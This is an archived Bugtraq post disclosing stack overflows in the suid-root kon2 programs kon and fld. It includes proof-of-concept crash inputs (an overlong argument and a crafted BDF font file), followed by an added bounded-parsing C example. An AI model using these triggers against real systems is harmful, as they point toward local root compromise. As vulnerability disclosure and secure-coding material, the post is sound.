Bugtraq mailing list archives
Problems with "kon2" package
From: chris () FERRET LMH OX AC UK (Chris Evans)
Date: Mon, 19 Jun 2000 23:51:53 +0100
Hi,

I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console I'm led to believe.

SUMMARY
=======

kon2-0.3.9

In the version I briefly examined, there were three suid-root executables

- kon
- fld
- newvc

Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified if something has dropped root
privileges or not at the time of the overflows.

DEMOS
=====

No discussion of code flaws today, because boring stack overflows are being
used.

1) kon

   kon VGA -StartupMessage `perl -e 'print "A"x10000'`

   => segfault with EIP 0x41414141

2) fld

   a) Create file "read.me.and.die", contents:

      CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
      CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
      CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
      ...

      BUT substitute each sequence of A's for 200 A's

   b) fld -t bdf read.me.and.die

   I don't get a clean 0x41414141 stacktrace but that's just a minor detail,
   and these things are always circumventable (I think a pointer gets toasted
   in between two char[] buffers on the stack)

Cheers
Chris
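Added example, not part of the original post and not kon2's code: a bounded way to read a BDF property value such as the CHARSET_REGISTRY line above into a fixed-size buffer, rejecting values that do not fit. The function name bdf_prop_value, the 64-byte PROP_MAX and the sample lines are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define PROP_MAX 64   /* assumed capacity of the caller's buffer */

/* Copy the quoted value of a BDF property line, e.g.
 *     CHARSET_REGISTRY "JISX0208.1983"
 * into out (capacity outsz). Returns the value length, or -1 when the key
 * does not match, the quoting is malformed, or the value would not fit. */
int bdf_prop_value(const char *line, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    const char *start, *end;
    size_t len;

    if (outsz == 0 || strncmp(line, key, klen) != 0)
        return -1;
    start = line + klen;
    while (*start == ' ' || *start == '\t')   /* optional whitespace */
        start++;
    if (*start != '"')                        /* value must be quoted */
        return -1;
    start++;
    end = strchr(start, '"');
    if (end == NULL)                          /* unterminated value */
        return -1;
    len = (size_t)(end - start);
    if (len >= outsz)                         /* reject, never truncate or overflow */
        return -1;
    memcpy(out, start, len);
    out[len] = '\0';
    return (int)len;
}

int main(void)
{
    char value[PROP_MAX];
    char big[256] = "CHARSET_REGISTRY\"";     /* constructed oversized input */
    size_t n = strlen(big);

    memset(big + n, 'A', 200);                /* 200 A's, as in the report */
    big[n + 200] = '"';
    printf("normal line: %d\n", bdf_prop_value(
        "CHARSET_REGISTRY \"JISX0208.1983\"", "CHARSET_REGISTRY",
        value, sizeof value));
    printf("200-byte value: %d\n", bdf_prop_value(
        big, "CHARSET_REGISTRY", value, sizeof value));
    return 0;
}
```

The length is checked against the destination capacity before any byte is copied, so the oversized line is refused as a parse error.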